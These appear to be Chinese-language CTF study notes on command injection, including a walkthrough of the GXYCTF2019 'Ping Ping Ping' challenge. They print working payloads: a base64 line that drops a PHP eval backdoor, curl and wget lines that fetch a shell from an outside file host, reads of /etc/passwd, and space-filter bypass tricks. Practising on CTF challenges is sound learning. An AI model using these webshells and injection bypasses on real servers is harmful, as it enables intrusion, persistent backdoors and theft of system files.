获取flag（传木马文件）

文件地址可以用

3个方法

echo  PD9waHAgQGV2YWwoJF9QT1NUWzEyM10pOyA/Pg== | base64 -d > aab.php

curl   https://bashupload.com/atR2C/111.txt > shell.php

wget  https://bashupload.com/atR2C/111.txt

用定向符  ls / >112.txt

再打开这个文件，就可以看到根目录

再cat /flag.txt >112.txt ，然后打开112.txt，就可以得到flag

空格过滤方法

​< 或 <>​​	cat</etc/passwd	用 < 代替空格（重定向符号）
​​${IFS}​​	cat${IFS}/etc/passwd	IFS 是内部字段分隔符
​​$IFS$9​​	cat$IFS$9/etc/passwd	$9 是空参数，增强兼容性
​​{cmd,arg}​​	{cat,/etc/passwd}	花括号扩展语法（仅限bash/zsh）
​​%09 (URL编码)​​	curl%09http://example.com	在HTTP请求中代替空格（需解码）

[GXYCTF2019]Ping Ping Ping

3种方法

第一种

测出空格，flag被过滤

空格用$IFS$9来代替

flag 先定义a=g，然后$a=g

所以   ?ip=;a=g;cat$IFS$9fla$a.php

然后再查看网页源代码

第二种

用反引号

?ip=;cat$IFS$9`ls`

再打开网页源代码

第三种

用base64编码

`echo$IFS$9​​Y2F0IGZsYWcucGhw|base64$IFS$9-d`

再打开网页源代码